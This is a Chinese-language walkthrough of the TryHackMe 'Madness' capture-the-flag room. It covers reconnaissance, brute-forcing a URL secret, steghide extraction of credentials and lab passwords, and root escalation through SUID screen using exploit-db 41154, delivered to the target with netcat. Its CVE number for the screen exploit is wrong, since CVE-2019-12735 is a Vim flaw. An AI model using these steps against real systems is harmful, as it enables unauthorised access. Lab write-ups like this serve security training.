Madness - TryHackMe
一、信息收集
使用nmap对网站ip端口开放进行探测
nmap -sS -sV -A -Pn 10.10.35.188
这里开放了一个22端口和80端口访问一下
是个配置目录 使用dirsearch看看还有没有其他隐藏页面
dirsearch -u http://10.10.35.188/ -e php,html,txt -t 100
这里有个登录页面登录显示NotFound
二、渗透利用
无法了先看看首页的源码吧 右键查看源代码
这里有个图片 thm.jpg 访问一下显示图片已经损坏了,我们把他下载下来仔细研究一下
这里就很奇怪,这个文件是jpg结尾但是文件二进制格式确实png
我们把开头改回来
改后
修改完后使用xdg-open 查看告诉我们下面有个隐藏的目录访问看看
hidden directory/th1s_1s_h1dd3n
这里说要输入他的秘密,先右键查看源代码这里给了我们一段提示说是介于0~99之间
在url后面添加上/?secret=1 即可输入秘密
这里先用yakit抓个包爆破一下吧
在第73个这里成功输入他的秘密
y2RPJ4QaPF!B
三、隐写术
我们使用steghide extract -sf thm.jpg 输入我们得到的得到的密码成功提取出一段隐藏的文本
这里使用这个账户和上面那个密码还是无法登录,可能还另藏玄机,我们注意到我们房间首页上面还有一张图片,新建链接,将他下载下来
我这里继续使用steghide提取然后没输入密码就出来了 啊?我还验证了一下, 不管了文件下面出现了我们想要的密码登录看一下
steghide extract -sf '5iW7kC8 - Imgur.jpg' *axA&GF8dP
这里尝试登录ssh怎么死活都登不上去看了一下wp前面那个用户名是用了ROT13编码后的 真正的用户名是joker 这回真成joker了
换了一个用户名也是成功登录了
四、提权
这里我看了 sudo --l 无法使用 计划任务也没有 只能从suid文件入手了
find / -perm -4000 -type f 2>/dev/null
screen 存在历史漏洞(CVE-2019-12735)允许本地用户利用 SUID screen 提权到 root
cp /usr/share/exploitdb/exploits/linux/local/41154.sh ~/screen_exp.sh ✔
chmod +x ~/tryhackme/screen_exp.sh
再使用nc将这个文件反弹回靶机
nc 靶机ip 4444 < screen_exp.sh
nc -lvnp 4444 > exp.sh
本地就会生成一个exp.sh的文件然后运行他
./exp.sh
接着本地会生成一个rootshell的文件然后在使用这个文件
rootshell